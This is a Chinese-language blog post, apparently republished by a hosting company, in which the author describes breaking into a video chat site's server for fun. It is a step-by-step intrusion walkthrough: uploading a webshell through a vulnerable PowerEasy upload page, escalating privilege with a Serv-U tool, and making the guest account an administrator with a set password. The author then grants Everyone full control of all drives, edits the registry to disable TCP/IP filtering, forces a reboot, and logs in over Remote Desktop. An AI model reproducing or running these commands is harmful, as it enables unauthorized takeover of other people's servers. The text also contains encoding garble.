|
一:得到webshell
今天晚上的一次小小測(cè)試���,由于本人太菜,再高深的技術(shù)我也不會(huì)�,只能這樣了..........
一切都已經(jīng)過(guò)去了,沒(méi)有辦法補(bǔ)圖了����,希望能看的懂這個(gè)小帖子�。
今天有是無(wú)聊的一天���,晚上實(shí)在無(wú)聊沒(méi)有事情干����,就到一個(gè)視頻聊天站點(diǎn)看秀���,嘿嘿~
突然發(fā)現(xiàn)一個(gè)聊天室特別的火暴���,人數(shù)已經(jīng)有500人在里面了(滿員了),刷了n次也沒(méi)有進(jìn)去..........更加郁悶了��。海
想想反正也是沒(méi)有事情做����,測(cè)試一下主機(jī)安全做的怎么樣吧,呵呵(太菜�����,說(shuō)測(cè)試人家安全實(shí)在是抬高自己了)
在cmd下ping了一下得到了對(duì)方的ip���,然后登陸http://whois.webhosting.info/對(duì)方ip看看有沒(méi)有其他的站點(diǎn)�����,哈�����,這下發(fā)了����,上面有幾十個(gè)站點(diǎn)��,估計(jì)我還是能找到一個(gè)兩個(gè)帶漏洞的站點(diǎn)的`
經(jīng)過(guò)漫長(zhǎng)的查找��,終于找到一個(gè)動(dòng)易帶漏洞的頁(yè)面http://www.xxxx.net/Upfile_Soft.asp���,上傳一個(gè)webshell(海陽(yáng)2005正式版)先(怎么上傳我就不羅嗦了����,上傳工具現(xiàn)在漫天飄了)�����。
二:成功提升權(quán)限建立用戶
拿到webshell后高高興興的登陸了,突然發(fā)現(xiàn)什么權(quán)限都沒(méi)有���,只能在自己的webshell所在的目錄里面打轉(zhuǎn)(c.d.e.f盤(pán)都瀏覽不了)���,連刪除文件的權(quán)限都沒(méi)有,郁悶呀........
回到〖Server〗下看看主機(jī)開(kāi)了什么服務(wù)吧�����,經(jīng)過(guò)發(fā)現(xiàn)他開(kāi)了終端服務(wù)和serv-u服務(wù)�����,哈���,這下有搞頭了^_^用superscan掃描了一下他的ip���,果然通過(guò)banner看出他是用的serv-u,版本5.0���。
到〖Wscript.Shell〗下面試試看能執(zhí)行cmd命令不能�����,輸入net user后沒(méi)有反映�,再試通過(guò)Wscript.Shell能執(zhí)行cmd命令不能�����,再次輸入net user后執(zhí)行返回了對(duì)方的user名單���,哈哈�,這下好了�,能拿下了!�!
上傳serv-u提升工具到D:\a004\tggtwe\****.com\UploadSoft目錄下面,改名為:test.exe��,然后回到〖Wscript.Shell〗下執(zhí)行命令去了����,嘿嘿,馬上一只肥雞就要到手了���,高興ing~
通過(guò)Wscript.Shell執(zhí)行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "net user guest /active:yes" #激活guest賬號(hào)����,我喜歡用這個(gè)賬號(hào)
D:\a004\tggtwe\****.com\UploadSoft\test.exe "net user guest lvhuana" #把guest賬號(hào)的密碼設(shè)定為lvhuana
D:\a004\tggtwe\****.com\UploadSoft\test.exe "net localgroup administrators guest /add" #提升guest權(quán)限到admin權(quán)限
好了,賬號(hào)建立完畢��,執(zhí)行一下net localgroup administrators看看成功沒(méi)�,通過(guò)回顯知道添加成功了。然后執(zhí)行netstat -an后看到他開(kāi)的終端端口是默認(rèn)的3389�,OK,連接試試~
三:解決TCP/IP篩選
連接不上��������?暈...........再拿出superscan來(lái)掃一下他的3389��,根本掃不到........(開(kāi)了防火墻������?靠�����,我的點(diǎn)真背.....)
沒(méi)有辦法了,再次回到Wscript.Shell執(zhí)行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe c: /e /t /g everyone:F" #把c盤(pán)設(shè)置為everyone可以瀏覽
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe d: /e /t /g everyone:F" #把d盤(pán)設(shè)置為everyone可以瀏覽
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe e: /e /t /g everyone:F" #把e盤(pán)設(shè)置為everyone可以瀏覽
D:\a004\tggtwe\****.com\UploadSoft\test.exe "cacls.exe f: /e /t /g everyone:F" #把f盤(pán)設(shè)置為everyone可以瀏覽
這下最少可以遍歷整個(gè)硬盤(pán)了���,我在硬盤(pán)里面到處的翻����,找遍了也沒(méi)有找到他的防火墻文件�,這下心里有數(shù)了����,肯定是他進(jìn)行TCP/IP篩選了!(當(dāng)然也有是內(nèi)網(wǎng)做服務(wù)器的可能����,具體大家自己可以根據(jù)ipconfig -all來(lái)判斷)
突破TCP/IP篩選我們可以更改他的注冊(cè)表來(lái)實(shí)現(xiàn),我們要做的就是導(dǎo)出他注冊(cè)表的三處���,更改后再導(dǎo)入就可以了��,回到〖Wscript.Shell〗執(zhí)行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip" #導(dǎo)出注冊(cè)表里關(guān)于TCP/IP篩選的第一處
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip" #導(dǎo)出注冊(cè)表里關(guān)于TCP/IP篩選的第二處
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -e D:\a004\tggtwe\****.com\UploadSoft\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" #導(dǎo)出注冊(cè)表里關(guān)于TCP/IP篩選的第三處
然后回到〖Stream〗或〖FSO〗發(fā)現(xiàn)1.reg,2.reg,3.reg已經(jīng)安靜的躺在那里了��,嘿嘿~
把1.reg,2.reg,3.reg下載回來(lái)到自己的硬盤(pán)里面編輯一下���,把關(guān)于TCP/IP篩選的幾個(gè)地方改一下,首先打開(kāi)1.reg找到"EnableSecurityFilters"=dword:00000001把最后面的數(shù)字1改成0后保存����,然后更改2.reg,3.reg���,更改方法一樣,我就不再羅嗦了~
然后我們把1.reg,2.reg,3.reg再上傳回對(duì)方的機(jī)器里面(這里我們要選上覆蓋模式��,因?yàn)闆](méi)有權(quán)限刪除原來(lái)的1.reg,2.reg,3.reg)����,上傳成功后再回到〖Wscript.Shell〗執(zhí)行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\1.reg" #安靜模式下把我們修改完的1.reg導(dǎo)入到他的注冊(cè)表
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\2.reg" #安靜模式下把我們修改完的2.reg導(dǎo)入到他的注冊(cè)表
D:\a004\tggtwe\****.com\UploadSoft\test.exe "regedit -s D:\a004\tggtwe\****.com\UploadSoft\3.reg" #安靜模式下把我們修改完的3.reg導(dǎo)入到他的注冊(cè)表
OK!導(dǎo)入后重新啟動(dòng)他的機(jī)器后在能解決TCP/IP篩選問(wèn)題���,再在〖Wscript.Shell〗執(zhí)行cmd命令:
D:\a004\tggtwe\****.com\UploadSoft\test.exe "iisreset /reboot /timeout:00" #利用他自身的iis服務(wù)來(lái)重新啟動(dòng)他的機(jī)器��,/timeout:00這個(gè)參數(shù)是讓他立即重新啟動(dòng)
執(zhí)行完后我們?cè)儆胹uperscan已經(jīng)掃不到他了��,吼吼~已經(jīng)重新啟動(dòng)了����!
四:成功用終端登陸
經(jīng)過(guò)漫長(zhǎng)的等待后(其實(shí)時(shí)間不長(zhǎng)���,只是我在這里已經(jīng)等不及了����,嘿嘿~),終于可以用superscan掃到他了����,并且可以掃到他的3389端口了,哈哈���,終于成功了,拿出終端登陸器順利的用我剛才建立的user:guest�����,pass:lvhuana登陸上了���!
好了�����,這篇垃圾文章到此就該結(jié)束了��,已經(jīng)凌晨了��,也該收工睡覺(jué)了~由于本人太菜�����,錯(cuò)誤地方肯定在所難免�,讓大家見(jiàn)笑了,同時(shí)望大家指正��!
億恩科技地址(ADD):鄭州市黃河路129號(hào)天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【mszdt.com】
服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)�����!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商��!15年品質(zhì)保障�����!--億恩科技[ENKJ.COM]
|
香港服務(wù)器租用
美國(guó)服務(wù)器租用
電信骨干機(jī)房
聯(lián)通骨干機(jī)房
0371-60135900
